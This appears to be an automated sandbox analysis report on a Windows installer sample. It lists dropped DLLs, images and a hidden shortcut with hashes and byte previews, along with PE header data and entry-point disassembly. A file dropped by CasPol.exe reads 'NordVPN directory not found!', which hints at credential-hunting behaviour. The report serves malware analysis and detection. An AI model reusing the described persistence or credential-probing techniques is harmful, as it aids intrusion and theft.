                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, frames 3
                                    Category:dropped
                                    Size (bytes):5273
                                    Entropy (8bit):7.8459330085163606
                                    Encrypted:false
                                    SSDEEP:96:BSTzREvsu6i0msHhj/HJBGZgCCoRPpr0wIqPnKV1+zNdgyJN6zx+f:oXRduqmuH7WTCoZpr0wIKnqtBy
                                    MD5:87BD29AF594463CC21D67CDC21F5B782
                                    SHA1:ED6D1F8936D968BE1DDAE4E38C3C38697B9BC038
                                    SHA-256:4D24FDEE4E7EC7B701C7148481B4EDD0D7941FD3656F4AED722D35F4FC2B9E1D
                                    SHA-512:80BF149D0246932A1139FC9B7ADD97B73B66BA8DE1C2905381520C535CC712AECBEDDC33B81A0770E73D3C4F6036974CD66B0C26F9CD4F16EF8FADE97E395F73
                                    Malicious:false
                                    Reputation:low
                                    Preview:......JFIF.....d.d.....:Exif..MM.*......Q...........Q..........aQ..........a.......C....................................................................C.......................................................................n.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(..Q.Y.Y~..$.m.x.Y..>?Muw..+....}x.w.$....$.o.v.....v.........&6....s.......>...~..?.<..m...i.f..?g\{.`..:....& .|...)..9'8........Z.3...."U*s?y..e/.1.\.........0_..'.<..@...3K/.-.]4k$../..\....O....:..q.d.?.>...}.........$o.s...T.l1P.F.0..X.\.c_.v........G .U.H..:......N@u
                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe
                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):349736
                                    Entropy (8bit):6.164191441093237
                                    Encrypted:false
                                    SSDEEP:6144:kj1LBBf6sKCJIELSHbz0RzFu8xbpr+6vl:GBBwyLAMJFuw
                                    MD5:DFA10F926778550AB0BB0804629686D2
                                    SHA1:33CEA03A49A941ADF49BE28F797D8E76E1D83828
                                    SHA-256:22136256BF7D3D9F96B21C32A5409CF014705C7673787A6ACC8C0CDCACC2F9F5
                                    SHA-512:7E9C97E2C667EF7C1E35C5C6B777A2A458BB8D42B5355B13E164C4F4F857788EB127651CD1947C87BBECCE9ACDE210DCF9AC186C85769669F0CAE055AD217745
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Reputation:low
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R{..<(..<(..<(.=)..<(.8)..<(.?)..<(...(..<(..=(..<(.9)..<(.<)..<(.2)..<(..(..<(.>)..<(Rich..<(........................PE..d...r..6.........." .....l..........P..........f.............................`......1.....`A........................................`.......0...h....@..(........2......(<...P......P...T...................x...(...p............... ................................text....j.......l.................. ..`.rdata..$N.......P...p..............@..@.data...l"..........................@....pdata...2.......4..................@..@.rsrc...(....@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):144776
                                    Entropy (8bit):7.53285913295622
                                    Encrypted:false
                                    SSDEEP:1536:uPIMC3CoPO4bEtoxzYk55G6J9reDiy8rdsidRg5PdNdxCNBXl6ZjvhvzIMAzys3E:WIv7OSX269rUmsWXl6ZjvnAzys3OqwL
                                    MD5:1CA9D8B65434B23BBB1F878FB7E15B45
                                    SHA1:B08D04A9B064652238DAC280153990D8556AAD9E
                                    SHA-256:A0631B0E00F3221BC06C36AF0B18D8528603CED8491173AFA9F955C91C9F90E2
                                    SHA-512:2D94B7E8A9352FE149CD305529A45FFC5099B7E6C2FA55B83A615F216C7C6207373768734C67CE9750A60E18E8A8718EDE1D2CEF194ED3E1746B704B8D15C249
                                    Malicious:false
                                    Reputation:low
                                    Preview:m.7..y......3....y..>,..'h,....Sc........L._z.kM..z......).......@y9...7H.}..`.Li.1.^.@b.G..........M.q.F&.0.h[&......0..^=......Is$.......C*A&..ox.*r.foM...W{fUkR.^...(..W...k....%.o..r....q.Zw..!..........:.TT.vm<..+.y(..],.I.5X'R>.|.#..f,}..|z0.g.....~..N..W+...Y...h...........g...._[1......0.n..I(n.s...>oC..%4+....Jh....f.k..1P..=.a."..W.....-...."q;......%...h....7.`......9..+...@!...G.~2>r.J.\.l.u.x...o...#d....)M.S5X.&...Q.d|93.... |D''...vg..6D.%[.~.....u.o.R.o|*.o.@3.T...,..~./..|.,........j.......LZ....n......QM..._...r]a...JPJ.9j..6.uK.....v2*......z.ZC.qzz.`.......J...4.0c!....Q.I.W...z|.K~T..Z.{.cnG............E=...A..2.t.A..0...c......\}?..JKQ...h..".37.;...jg.U.~d.........<...W.e.x.@@.1..^O.......p.Gj.H.R..B.E...]..n..Z..ot.. ...i..._...AyU.L........./........:y...M.h....M.G...K.w.....~Z.H~.e..`.;.9.!.1*.....O..0..]..........6@.V.g.....F.@A.'K.w?.vGHB...Fgk'[....a1..T.C.....*.wM.4...;+..g3(r...T..&?)...5..../.8._.x1X<y4.!
                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe
                                    File Type:OpenType font data
                                    Category:dropped
                                    Size (bytes):134872
                                    Entropy (8bit):6.990627903031805
                                    Encrypted:false
                                    SSDEEP:3072:sz0DOC7z/NU32nX3CC38LWDvzsGgDHKEqnk8X+5s9n5cWY2+o:57z/NU32nkWDvRzBl+5s9mWYvo
                                    MD5:49776B1F23800D9C82D529FCC027D16D
                                    SHA1:7BA6D923A0D163CE16DA4DD1105945C47406CADC
                                    SHA-256:78ADEC30836955EDFB3968D23F79662A64E62B5DE236C64FC9964C7632D83963
                                    SHA-512:252DEDE5F71BB6736DCFC76D0CBF52B0FA01D92813CF4A74714C9D271C10286336405C15A06778E3617B7485030FC1D9FB314A6BB302446F299162C22C0068BF
                                    Malicious:false
                                    Reputation:low
                                    Preview:OTTO.......`BASEe.]........FCFF .....FL....DSIG............GDEF.......,....GPOS.{.\........GSUB..].......JOS/2.......P...`cmap.spB......3fhead..h<.......6hhea.3.s...$...$hmtx...~.......Bmaxp. P....H....name...7........post...3..F,... ........4.]._.<......................*.:...$.......................X.*.*......................P.. .....X.........X...K...X...^.2.,............ .....8.........ADBO... ............`.............. .....J.~.................................$.............<...........H...........T...........`...........l.........&.~.........&...........*...........6...........D.*.........:.n.....................2...........$.......................D.*.....................*.......................H...........*...........d.X.........&.......................4...........4...........2........... .<.........4.\..........................................................................................................."...........4.........$.F......... .j.........,...........0............
                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:modified
                                    Size (bytes):38
                                    Entropy (8bit):4.438588368649811
                                    Encrypted:false
                                    SSDEEP:3:9J7KCE/VJOKkJe:9XE/Vwc
                                    MD5:2904F70F565669B3C2799CD77F98909F
                                    SHA1:567E83FD531B1530D2476B43AE79114D543B195A
                                    SHA-256:327226A389956762200BA7198625E1DEB03D036CB218E8F1AFD7C9B727AA32EE
                                    SHA-512:F0BD8A19527942FE0170E001F36D0A4234A5D049D897A2B7A225C061A9B2B5C0E37E2BFE0B2BB945464B90E6BDD7922E4E8A62EF0686D7A09E2F544FBA2A54A3
                                    Malicious:false
                                    Preview:[Disfellowship219]..totempl=Forgrown..
                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe
                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):852
                                    Entropy (8bit):7.714388915009416
                                    Encrypted:false
                                    SSDEEP:24:PUalwngqdk8kgfLRaKT4+vZsnKzajzkPTD+3xc:MWckSLRj4+vZsKzajzkPTWc
                                    MD5:C007F7CF6900C902101AF7DEEAB1A81D
                                    SHA1:7A10B42A75F63FB53D5FAB96A9521D91FB639C35
                                    SHA-256:3237623948F6A90DE7731BC8E50C212DCD356220F84A74615A52820446B22CC9
                                    SHA-512:0CE9BD720137D084ED622B517F968ADF659C30BD89F04D52B11FC1B16E9BCEC27FDCAF64F24522B4F1818FD9F09AB79ADD18819D0A385D52A390ADD8D3E90A27
                                    Malicious:false
                                    Preview:.PNG........IHDR................a....IDATx.u..pCg8.m...8...p...X..m.q......2..g..k1W.......\.c8.6..2}nt.:."......e...E.).....f`~ifjniJ....l......Rf.X./,.g....s..K.. . .t:@...P$....4.oh|...............L|.t9........e..Y..\.[..#}...>U.`7........}j|r.....`.......e.D2>.'..J....l.@..m.j5.`.B-.F.tvv..?..X.."d..Y.J..pOff.M.l..Y9...*.\,.....EGW.....y\GW.lht......pw....4'.....YX..~Ee.T..*}..j[".....A.l6+.o....$.[....u.....*.lBumE...b.W.T3S.X..qvQ..T.#.........J.......j........W.....PP .AGO.i]CM.?...^i.h.[........_.{.+......`{ay.,WH./.@K[.Qk{s.:XWfee]....v{W+"...Uj%TV.......x....,..%.E!...k....Ag.....w...7.....a....((.G2......%..G...B.n....K.b......"..y@..<95v.9.p./R3...0..yerr.5.MIK.c..._.........;eHrJ.^Rj.2)9.........ugrj.D*...d.rj"+-#%h...O.D..?...Itt.-..[.......Q..c....cb...!..z.....)..]...&..H....IEND.B`.
                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):173064
                                    Entropy (8bit):3.693018919711273
                                    Encrypted:false
                                    SSDEEP:1536:pS8DwEnRUjJhZpn9uf9Zmzv7kLV2B68v+JqL/wX8P66QhaF5tVw:s88LDZpncqzv7orc+JqL/wXhlaF5tO
                                    MD5:4F18D3455ED4916E37CAE7DC97E4F281
                                    SHA1:B8C07DD3C97231EBD51A4AA9DB64E32378AAE1E2
                                    SHA-256:9254A461B08B2CEEC9B70B733DB20D83CED38928BB36CB4AFBBC2CE70EC4A709
                                    SHA-512:589875F2066D05AD61B1508D2AE69EE5F8648FC0505BD1B6DCD341382CFD87DFE3E12885096B5B506C0D86D8342355AED2320961921CBB5E6E2FBC6A7033181A
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.@...R.@.P...R.Rich..R.................PE..L....\)b...........!................................................................."....@.......................................... ...~............... ...........................................................................................rdata..p...........................@..@.rsrc....~... ......................@..@.....\)b........T........................rdata......T....rdata$zzzdbg.... ... ...rsrc$01.....@...^...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe
                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                    Category:dropped
                                    Size (bytes):740140
                                    Entropy (8bit):6.445034069568258
                                    Encrypted:false
                                    SSDEEP:12288:m5h4fIuyHZyxAW+RHDfi7qmkLpRxNRcldaxSqKfEWmjJthNw:m5Gy+mHL6qXLPv0dax3vZjJthNw
                                    MD5:0F0A450E617F355FCA577DED02E52EDE
                                    SHA1:AEB92363E754D5EE6DB1E634C04EB1EFE6E3276B
                                    SHA-256:161E0693AD4FE7E9EB411411AD72697FCB7BB18BF0BCAE2D884A52875B0CD2F8
                                    SHA-512:26A05A5B794C56FC2C4B794CE38598F78124B89AE8C815BB0F487EAD639B7039FFFC5067D2A1E22455FDE69BE8E70D97663E9C9B1D7A2CD3753F92303717BDA2
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........8..}.....&"...%.x...4......P..........b....................................Cy....`... ......................................@.......`...................E...........................................x..(...................@d...............................text....v.......x..................`..`.data................|..............@....rdata...............~..............@..@.pdata...E.......F...j..............@..@.xdata..XG.......H..................@..@.bss.........0...........................edata.......@......................@..@.idata.......`......................@....CRT....X............$..............@....tls.................&..............@....rsrc................(..............@....reloc...............,..............@..B................................................................................................................................
                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe
                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                    Category:dropped
                                    Size (bytes):281695
                                    Entropy (8bit):6.168605016920544
                                    Encrypted:false
                                    SSDEEP:3072:uD/iPx3WGmBoVKxtW0qib30Mj/vYYoGtjGeIGA9R23m6+PiaAtB3NFUQ8:uTUGprc6HfIG86+adX3NFUQ8
                                    MD5:A4E14B1F3042BFBF0B018561F8611D93
                                    SHA1:5C4C26F66ADCC1B40D7FF3113701FD9DCA9F74E6
                                    SHA-256:624E1E55F227897EB6E5852D28F0448F25ADE61A98894789FD45A3F8AE32D0EA
                                    SHA-512:DA4D86DF061948A37D513132686E91E13960FA28EB427BB841E0DACBF91564B3713DE6CA5EE49D17C0E1B449C0252EF9F4E8C02205BF2169CA7D761DC3872802
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........F../.....&"...$.....B......P..............................................e.....`... .........................................5....................P.............................................. ?..(.......................X............................text...............................`.P`.data...............................@.P..rdata.. z.......|..................@.`@.pdata.......P.......&..............@.0@.xdata.......`.......,..............@.0@.bss.........p........................`..edata..5............2..............@.0@.idata...............:..............@.0..CRT....X............@..............@.@..tls.................B..............@.@..reloc...............D..............@.0B........................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe
                                    File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                    Category:dropped
                                    Size (bytes):946
                                    Entropy (8bit):3.052040826013451
                                    Encrypted:false
                                    SSDEEP:12:8wl0URsXUCV/tz+7RafgKD4Tb6cNlb6c4mWQ18/rNJkKAh4t2YCBTo8:8o+raRMgKsTb6kb6ROS5HALJT
                                    MD5:CEF1DBE94CD9FC27F66DB38107A63357
                                    SHA1:22440A9A6E4D990595E3F614F69E12B0AADAEA1D
                                    SHA-256:22DE790D45C8C98C65C0FC8FF06BF39B7AA9B0655E33038FF0918B15824A90F0
                                    SHA-512:1AACE6999D1464E1BD21FE8F0C257934448740A10A60741C74CAB8F8255EFFC8E6B1F675EAF69CFFC930B7D2EC514C48209C7B7BC3810E5BB417DC3ECA6406B8
                                    Malicious:false
                                    Preview:L..................F........................................................3....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................A.r.t.h.u.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....N.1...........Temp..:............................................T.e.m.p.....l.2...........TOLVAARIGE.exe..N............................................T.O.L.V.A.A.R.I.G.E...e.x.e...........\.T.O.L.V.A.A.R.I.G.E...e.x.e.".C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.1.................
                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe
                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):223
                                    Entropy (8bit):6.55427581037989
                                    Encrypted:false
                                    SSDEEP:6:6v/lhPys5+G7Zv9TOdnE/q5KBdsu4TmS/Vp:6v/7ZZBOl9K5e
                                    MD5:AA3A4757FF50F980EC23D5A65F6FBC0D
                                    SHA1:ABA35FCE13E7EEC52BDCD1756AB6AC7F3CBE0B17
                                    SHA-256:3E4429457A1C313920FAFE775494BBA5049BBFA41A4F29789CCC19432FD89348
                                    SHA-512:C26C744CE5149634D6698A7181F1F08668FEA902004BDDF0EA011097D139A58173ECE62B22DA376608406AA1A1FC65B496EF1373E1C6B532C430240F3AE7CF8F
                                    Malicious:false
                                    Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8...=..1....*.....QY...s.q...`+...Z.TK..+....$.^!..[,.>.g.q.1.a.Q.2L/..R,..*w...Z.3?5.Qu.SE.o(..c..!..h...1....K.B;..3.y.Z..yh7M.N...D......z'.....)....IEND.B`.
                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe
                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):218
                                    Entropy (8bit):6.548843212391007
                                    Encrypted:false
                                    SSDEEP:6:6v/lhPysNBnmGKjdTJ8K49bFOk7K8ml2up:6v/7tBm5pJ8K8bFYl2c
                                    MD5:FDD6EA8CAE0923DB4A381DB85A2D1DB8
                                    SHA1:7906C57D827F884958F72BBD1C67A52D48566F13
                                    SHA-256:E53F28526B8E67491CD5CB7D1CBC0402F0D6FCB5C8C8E9428BFDD1D46AE1D7F2
                                    SHA-512:FDC59FA991F2EB0770A6D54B892BE9F635F35A4D5FB258D5D8259C1BD30574B24892E9DC1936CCD012366578EEDB5B0FDD989B2544842B25D45B77653BE157D9
                                    Malicious:false
                                    Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8.....0...P.h.h..a..{0cr....$'...O.!....;....v....@q..#gu......C._.p.=... ......{G.......X$.......F..7i.....@....3.....$..p..E..LwO'n...F1.[.tn....IEND.B`.
                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe
                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):718
                                    Entropy (8bit):7.267310509580342
                                    Encrypted:false
                                    SSDEEP:12:6v/7maZB4RO4HE+swFIUyrlxSTWLCMpffTn0589Gug9Beu1qG6Fh1ClN:tak15ypxST1MpffTAjv9R1dujmN
                                    MD5:151CC83E1B8F2239625A521AD3889884
                                    SHA1:F6951B61B7BE182EE6493DD7CB02DDF5EBE2BCB3
                                    SHA-256:B698DFD02677369423FDA9D0A2C499A1B7788A4AA3D500D20E1DFBDC47E64599
                                    SHA-512:A23168D29CFF32344EEA6C2D2895FD8055C5318074C0EE34DCEEC391630350E98A9D8813736ADB49EE87D8B2F02FE219E08811F569887F846D400D92A66DD085
                                    Malicious:false
                                    Preview:.PNG........IHDR................a....pHYs..........o.d....tEXtSoftware.www.inkscape.org..<.....tEXtTitle.Adwaita Icon Template...?....tEXtAuthor.GNOME Design Team`.v~...RtEXtCopyright.CC Attribution-ShareAlike http://creativecommons.org/licenses/by-sa/4.0/.Tb.....IDAT8...Ok.Q...w&.S.V.....`..&P?..].N..R........Eq..Ih.....d..CG.vH'..<.m.M"8xW.w...R(l.V?Vnz.'..)e].6........i...Y)...TTZ..e....&..{..r...h.a...PJ...p..D..A.C|.GX..~E[.v.l....>{.G..#..\.%...u.(.\.`...z=...ss.qw\>mm....@_~...[...L.c.1..*..4..O.q.,^b"5.@..>..+...".F..."9...j....L.G.....J.../.[....TJ..b..X|.....Q*.74M.k..J....pt{A..~.......a.2..z..n.w.M...P..~6s.........l~.m.`...w....?~.2.....WQ...d..e...Yc.-..{._b....K....IEND.B`.
                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):12288
                                    Entropy (8bit):5.814115788739565
                                    Encrypted:false
                                    SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                    MD5:CFF85C549D536F651D4FB8387F1976F2
                                    SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                    SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                    SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: Metadefender, Detection: 3%, Browse
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe
                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):562
                                    Entropy (8bit):7.483849388462199
                                    Encrypted:false
                                    SSDEEP:12:6v/7F9WLE/mpAJyXrrPWBQXhKTclrG/9/8W8OInefodAbctQ2TpmOtaxXc:q9uKIPuQXhKIhrOaefkA4tQ2EQ
                                    MD5:7A1C7CD0874509E35CA8738D6426EC61
                                    SHA1:02964393DAD3BB1EAA38C7315E80CA32B1C16B95
                                    SHA-256:8E1E44F59B17C6BFF086F0B2DD4DD1325DF9CD276629BC7ABDBA6719DD76289F
                                    SHA-512:74527D173C08228EE551E7BC54460B3E2B8ABA6A2C964C736EB92F3B6AEB576026C96B9DA1C78A72E854D44258E1DD3ABFCD2F01C81D0784559CEC0A2848E1E5
                                    Malicious:false
                                    Preview:.PNG........IHDR................a....IDATx......Q.Fk[A....66k.m....m.m.....$93...A.~C".<..?t.....%....=.A!./.?l..x........:<yv...uhmka.......j.?[...+..dE..U/Y....X.j..P.h..o%n....X..G.?....X5..-.e...k.l..L..T..gO"==.U.e.HKK.3'.D"a....`....P.l..B.....|..;wo..W.^....ove..p....I......(--EEE.O.9.......4Jm.!.ttt ,4.:..uuu.AYY.TJ9.r......S....~..8.........B..B..#))I..!......".A..9.+....4Ju..Z....w..x..mu.*...VW...0_|`...Q...H.=.<..?.m....A.`....8:...2........#P..F..1...=@..P..l.........a}./.........x...w.!........"_.w..............IEND.B`.
                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):30
                                    Entropy (8bit):3.964735178725505
                                    Encrypted:false
                                    SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                    MD5:9F754B47B351EF0FC32527B541420595
                                    SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                    SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                    SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                    Malicious:false
                                    Preview:NordVPN directory not found!..
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                    Entropy (8bit):7.905193911181419
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:SecuriteInfo.com.generic.ml.22865.exe
                                    File size:912777
                                    MD5:deb3e51a2d7d566c86b22046c1058f1a
                                    SHA1:a780f7bbf2255a7dcd963c80fad20ee164ca6b93
                                    SHA256:4b4bb7b5e2fbe3814fca75d1ab132a97c67255ebfe6dc4f3312d64483a181286
                                    SHA512:c68bfec94fe42bea3b7c5f088963ff57d07866e8f773b290ca4b04422e5d34938b9c56e17ada69cd5bf0087fcf1f70551132ca0de21949c579615c296b1f3410
                                    SSDEEP:24576:sYii5KdghcAySSqmCJD8TWNaR87OxF7IziqjGFb:FiMKSjiqZJgTS9AFemb
                                    TLSH:551512640F9AC417E371C0FAA9B7C6486B76C9083E798481CFF61F75A678BAC5817183
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....
                                    Icon Hash:70f8adbcb8bca828
                                    Entrypoint:0x403640
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                    Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:61259b55b8912888e90f516ca08dc514
                                    Instruction
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 000003F4h
                                    push ebx
                                    push esi
                                    push edi
                                    push 00000020h
                                    pop edi
                                    xor ebx, ebx
                                    push 00008001h
                                    mov dword ptr [ebp-14h], ebx
                                    mov dword ptr [ebp-04h], 0040A230h
                                    mov dword ptr [ebp-10h], ebx
                                    call dword ptr [004080C8h]
                                    mov esi, dword ptr [004080CCh]
                                    lea eax, dword ptr [ebp-00000140h]
                                    push eax
                                    mov dword ptr [ebp-0000012Ch], ebx
                                    mov dword ptr [ebp-2Ch], ebx
                                    mov dword ptr [ebp-28h], ebx
                                    mov dword ptr [ebp-00000140h], 0000011Ch
                                    call esi
                                    test eax, eax
                                    jne 00007F146C63682Ah
                                    lea eax, dword ptr [ebp-00000140h]
                                    mov dword ptr [ebp-00000140h], 00000114h
                                    push eax
                                    call esi
                                    mov ax, word ptr [ebp-0000012Ch]
                                    mov ecx, dword ptr [ebp-00000112h]
                                    sub ax, 00000053h
                                    add ecx, FFFFFFD0h
                                    neg ax
                                    sbb eax, eax
                                    mov byte ptr [ebp-26h], 00000004h
                                    not eax
                                    and eax, ecx
                                    mov word ptr [ebp-2Ch], ax
                                    cmp dword ptr [ebp-0000013Ch], 0Ah
                                    jnc 00007F146C6367FAh
                                    and word ptr [ebp-00000132h], 0000h
                                    mov eax, dword ptr [ebp-00000134h]
                                    movzx ecx, byte ptr [ebp-00000138h]
                                    mov dword ptr [0042A318h], eax
                                    xor eax, eax
                                    mov ah, byte ptr [ebp-0000013Ch]
                                    movzx eax, ax
                                    or eax, ecx
                                    xor ecx, ecx
                                    mov ch, byte ptr [ebp-2Ch]
                                    movzx ecx, cx
                                    shl eax, 10h
                                    or eax, ecx
                                    Programming Language:
                                    • [EXP] VC++ 6.0 SP5 build 8804
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000x14ec0.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x66760x6800False0.656813401442data6.41745998719IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .rdata0x80000x139a0x1400False0.4498046875data5.14106681717IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0xa0000x203780x600False0.509765625data4.11058212765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                    .ndata0x2b0000x380000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
